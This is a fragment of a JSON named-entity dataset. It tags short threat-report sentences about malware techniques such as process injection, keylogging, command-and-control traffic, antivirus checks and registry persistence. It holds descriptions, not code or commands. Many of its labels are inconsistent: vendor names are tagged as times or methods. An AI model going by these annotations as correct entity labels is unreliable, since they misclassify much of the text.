"B-HackOrg", + "B-Way", + "I-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "writes", + "it", + "as", + "encrypted", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "it", + "as", + "soon", + "as", + "the", + "utility", + "is", + "running" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "as", + "obfuscated", + "data", + "in", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creating", + "a", + "registry", + "key", + "to", + "store", + "the", + "malware", + "code" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "saves", + "its", + "configuration", + "as", + "a", + "registry", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spawned", + "with", + "PowerShell", + "via", + "Task", + "Scheduler" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creating", + "a", + "scheduled", + "task", + "to", + "execute", + "the", + "malware", + "using", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "injected", + "into", + "the", + "winlogon.exe", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "injected", + "into", + "other", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "itself", + "and", + "additional", + "malware(s)", + "into", + "all", + "processes" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "be", + "injected", + "into", + "the", + "winlogon.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "carries", + "out", + "process", + "injections" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "loads", + "a", + "fresh", + "copy", + "of", + "ntdll.dll," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "loading", + "a", + "fresh", + "copy", + "of", + "“ntdll.dll”", + "from", + "disk", + "to", + "avoid", + "process", + "hollowing", + "detection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "via", + "dllhost.exe", + "using", + "process", + "hollowing", + "techniques." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "rootkit", + "when", + "new", + "processes", + "are", + "created" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injects", + "the", + "rootkit", + "to", + "a", + "newly", + "created", + "process", + "by", + "another", + "process", + "and", + "updates", + "the", + "callee", + "via", + "NamedPipe" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "executes", + "an", + "executable", + "using", + "process", + "hollowing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Enumerates", + "all", + "running", + "processes" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "a", + "file", + "using", + "ShellExecute" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "utilizes", + "the", + "same", + "Common", + "Name", + "in", + "their", + "TLS", + "certificate." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "secure", + "communication", + "through", + "TLS", + "encryption." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "support", + "for", + "TCP", + "network", + "streams", + "(both", + "IPv4", + "and", + "IPv6)," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Controlling", + "attached", + "camera", + "devices", + "to", + "take", + "pictures", + "of", + "the", + "compromised", + "computer’s", + "surroundings." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "takes", + "screenshots", + "at", + "regular", + "intervals." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "periodically", + "take", + "screenshots", + "and", + "store", + "them", + "with", + "information", + "about", + "the", + "foreground", + "process", + "and", + "time", + "since", + "the", + "last", + "user", + "input" + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "limit", + "the", + "disk", + "space", + "used,", + "images", + "where", + "fewer", + "than", + "5%", + "of", + "the", + "pixels", + "differ", + "from", + "the", + "most", + "recently", + "stored", + "capture", + "aren’t", + "saved." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "similar", + "screen", + "captures" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "custom", + "network", + "protocol,", + "which", + "can", + "function", + "over", + "HTTP" + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "we", + "can", + "see", + "one", + "more", + "HTTP", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "POST", + "request", + "used", + "for", + "FlowCloud", + "C&C", + "communication" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "send", + "and", + "receive", + "data", + "over", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "communicates", + "with", + "a", + "hardcoded", + "IP", + "address", + "via", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "can", + "communicate", + "over", + "HTTP", + "or", + "via", + "its", + "“normal", + "protocol”." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "HTTP", + "protocol", + "uses", + "the", + "message", + "format", + "detailed", + "in", + "the", + "previous", + "paragraph,", + "but", + "it", + "adds", + "a", + "few", + "extra", + "steps", + "to", + "disguise", + "its", + "traffic", + "as", + "legitimate", + "HTTP" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "fields", + "required", + "for", + "HTTP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "used", + "for", + "HTTP", + "client", + "requests" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "for", + "HTTP", + "server", + "responses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "by", + "prepending", + "the", + "data", + "with", + "a", + "hardcoded" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "raw", + "TCP,", + "for", + "C&C", + "server", + "communications." + ], + "ner_tags": [ + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "can", + "communicate", + "over", + "raw", + "TCP", + "sockets." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "normal", + "protocol", + "uses", + "raw", + "TCP", + "sockets", + "and", + "a", + "custom", + "message", + "format" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "B-HackOrg", + "B-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "which", + "can", + "check", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "can", + "check", + "running", + "processes", + "against", + "a", + "hardcoded", + "list" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "backdoors", + "can", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "functionalities", + "that", + "collect", + "information", + "about", + "programs", + "and", + "processes," + ], + "ner_tags": [ + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Other", + "commands", + "can", + "be", + "used", + "to", + "retrieve", + "a", + "detailed", + "list", + "of", + "available", + "services", + "and", + "currently", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "checks", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "running", + "processes", + "using", + "CreateToolhelp32Snapshot", + "and", + "Process32Next" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "PID", + "of", + "the", + "process", + "in", + "which", + "the", + "orchestrator", + "is", + "running." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "found", + "a", + "custom", + "AntivirusCheck", + "class,", + "which", + "can", + "check", + "running", + "processes", + "against", + "a", + "hardcoded", + "list", + "of", + "executable", + "filenames", + "from", + "known", + "security", + "products,", + "including", + "ESET", + "products" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "can", + "check", + "whether", + "specific", + "security", + "software", + "is", + "installed", + "on", + "the", + "machine", + "it", + "tries", + "to", + "compromise," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "there", + "is", + "a", + "custom", + "AntivirusCheck", + "class,", + "which", + "can", + "check", + "running", + "processes", + "against", + "a", + "hardcoded", + "list", + "of", + "XOR-encrypted", + "executable", + "filenames", + "from", + "known", + "security", + "products:", + "360", + "Total", + "Security,", + "Avast,", + "Avira,", + "AVG,", + "Bitdefender,", + "ESET,", + "Jiangmin", + "Technology", + "Antivirus,", + "Kingsoft,", + "McAfee,", + "Micropoint,", + "Norton,", + "Rising", + "Antivirus,", + "and", + "Trend", + "Micro." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Idus", + "B-Time", + "B-Idus", + "B-SecTeam", + "B-Tool", + "B-Org", + "B-Time", + "B-Org", + "B-Tool", + "I-Tool", + "O", + "O", + "B-Time", + "B-SecTeam" + ] + }, + { + "tokens": [ + "It", + "checks", + "running", + "processes", + "for", + "executables", + "of", + "several", + "known", + "cybersecurity", + "vendors." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "contain", + "a", + "section", + "defining", + "specific", + "security", + "software", + "to", + "check", + "for" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "include", + "the", + "ability", + "to", + "collect", + "mouse", + "movements,", + "keyboard", + "activity" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "records", + "keystrokes." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor’s", + "components", + "records", + "mouse", + "and", + "keyboard", + "activity", + "to", + "a", + "database." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "the", + "keylogger", + "component", + "of", + "the", + "driver", + "(described", + "in", + "the", + "next", + "section)", + "by", + "reading", + "data", + "from", + "the", + "\\\\.\\pipe\\namedpipe_keymousespy_english", + "named", + "pipe." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "it", + "acts", + "as", + "both", + "a", + "keylogger" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Read", + "(IRP_MJ_READ)", + "for", + "the", + "keyboard", + "driver", + "(kbdclass", + "or", + "KeyboardClass0)" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "handlers", + "for", + "keyboard", + "and", + "mouse", + "events,", + "the", + "driver", + "simply", + "records", + "IO", + "events", + "to", + "lookaside", + "lists", + "before", + "passing", + "them", + "to", + "the", + "legitimate", + "handler." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "by", + "compromising", + "a", + "web-facing", + "application", + "such", + "as", + "Microsoft", + "Exchange", + "or", + "SharePoint" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploited", + "Microsoft", + "SharePoint", + "servers", + "in", + "2019", + "to", + "gain", + "code", + "execution,", + "probably", + "by", + "leveraging", + "CVE-2019-0604" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "The", + "public-facing", + "application", + "compromise", + "approach" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "exploited", + "web", + "server", + "vulnerabilities", + "for", + "initial", + "access." + ], + "ner_tags": [ + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Initial", + "access", + "to", + "targets", + "is", + "obtained", + "by", + "exploiting", + "vulnerable", + "internet-facing", + "applications", + "such", + "as", + "Microsoft", + "Exchange," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "were", + "either", + "dropped", + "directly", + "via", + "the", + "webshell", + "or", + "downloaded", + "from", + "a", + "remote", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "following", + "files", + "are", + "downloaded", + "and", + "written", + "to", + "disk:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "communications", + "module", + "then", + "downloads", + "the", + "main", + "backdoor", + "module," + ], + "ner_tags": [ + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "downloader", + "simply", + "downloads", + "the", + "loader" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Encoded", + "Royal", + "Road", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "encrypted", + "file", + "is" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "identical", + "encrypted", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deployed", + "in", + "a", + "multistage", + "process", + "that", + "uses", + "various", + "obfuscation", + "and", + "encryption", + "techniques", + "to", + "hinder", + "analysis" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "values", + "for", + "these", + "executables", + "and", + "configuration", + "data", + "can", + "be", + "found,", + "encrypted,", + "in", + "the", + "loader’s", + "resource", + "section." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "most", + "resources", + "are", + "written", + "to", + "disk", + "encrypted," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "some", + "cases,", + "they", + "are", + "then", + "re-encrypted", + "but", + "with", + "a", + "different", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "same", + "sequence", + "of", + "opcodes", + "to", + "obfuscate", + "the", + "program’s", + "flow" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "control", + "flow", + "obfuscation", + "snippet" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "files", + "are", + "distributed", + "and", + "stored", + "in", + "encrypted", + "form." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64-encoded", + "strings" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "new", + "encrypted", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "configuration", + "file", + "is", + "encrypted", + "using", + "the", + "just-described", + "function", + "and", + "starts", + "with", + "the", + "magic", + "bytes", + "0xAF1324BC" + ], + "ner_tags": [ + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "encrypted", + "QuasarRAT", + "payload" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "control", + "flow", + "obfuscation", + "to", + "hinder", + "analysis" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "document", + "triggers", + "the", + "injection", + "of", + "a", + "custom", + "downloader", + "–", + "a", + "PE", + "executable", + "–", + "into", + "an", + "iexplore.exe", + "process." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "that", + "decrypts", + "hardcoded", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Shellcode", + "decryption", + "loop" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "only", + "decrypted", + "in", + "memory", + "when", + "needed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "loader", + "decrypts", + "and", + "parses", + "the", + "embedded", + "installation", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "rootkit", + "module", + "is", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "self-decrypting", + "DLL," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "[sic]", + "section", + "of", + "a", + "decoded", + "FlowCloud", + "config" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "It", + "first", + "decrypts", + "the", + "embedded", + "DLL", + "using", + "a", + "byte-oriented", + "XOR-and-ADD", + "scheme" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Once", + "it", + "has", + "decrypted", + "the", + "embedded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Self-decrypting", + "DLL" + ], + "ner_tags": [ + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "loaded", + "shellcode", + "is", + "a", + "self-decrypting", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "DLL", + "decryption", + "routine" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "only", + "decoded", + "as", + "needed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "thread", + "that", + "decrypts", + "and", + "loads", + "the", + "fcClient", + "module" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "embedded", + "module" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "into", + "the", + "shellcode", + "that", + "will", + "decompress", + "and", + "load", + "the", + "Korplug", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "It", + "decrypts", + "and", + "loads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "before", + "being", + "written" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "injects", + "it", + "into", + "iexplore.exe", + "using", + "WriteProcessMemory." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "next", + "stage,", + "injected", + "into", + "iexplore.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "injected", + "code", + "loads", + "the", + "same", + "backdoor", + "(rescure.dat)", + "into", + "the", + "process’s", + "memory", + "and", + "calls", + "its", + "startModule", + "export", + "to", + "finish", + "the", + "installation." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "injection", + "process" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "perform", + "process", + "injection", + "to", + "masquerade", + "as", + "harmless", + "processes." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "module", + "creates", + "a", + "new", + "process", + "using", + "the", + "same", + "executable", + "and", + "performs", + "process", + "injection", + "on", + "it,", + "redirecting", + "the", + "existing", + "thread", + "to", + "the", + "written", + "code", + "region." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "loader", + "injects", + "an", + "orchestrator", + "into", + "memory", + "in", + "a", + "svchost.exe", + "process." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "orchestrator", + "injects", + "the", + "network", + "component", + "into", + "memory" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "process", + "into", + "which", + "the", + "shellcode", + "will", + "be", + "injected" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "inject", + "shellcode," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Persistence", + "for", + "the", + "downloaded", + "payload", + "is", + "established", + "via", + "the", + "Tendyron", + "value", + "under", + "the", + "Run", + "key", + "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "task", + "or", + "service", + "attains", + "persistence", + "by", + "being", + "set", + "to", + "start", + "automatically", + "on", + "boot" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "then", + "sets", + "specific", + "registry", + "keys", + "and", + "files", + "as", + "guardrails", + "to", + "skip", + "the", + "setup", + "on", + "subsequent", + "runs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "filenames", + "that", + "are", + "either", + "similar", + "to", + "those", + "of", + "legitimate", + "Windows", + "files", + "(e.g.,", + "rebare.dll", + "which", + "could", + "be", + "mistaken", + "for", + "rebar.dll)", + "or", + "innocuous", + "looking", + "(e.g.,", + "AC146142)", + "to", + "avoid", + "suspicion." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "named", + "after", + "legitimate", + "utilities", + "are", + "written", + "into", + "the", + "%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\", + "subdirectory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "process", + "is", + "further", + "camouflaged", + "by", + "changing", + "its", + "associated", + "executable", + "filename", + "to", + "one", + "of", + "svchost.exe", + "or", + "dllhost.exe", + "in", + "the", + "same", + "kernel", + "structure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "registry", + "key", + "where", + "each", + "embedded", + "resource", + "is", + "to", + "be", + "written" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "writing", + "to", + "specific", + "registry", + "keys." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Network", + "shellcode", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "in", + "the", + "Windows", + "registry." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shows", + "the", + "three", + "registry", + "keys", + "used" + ], + 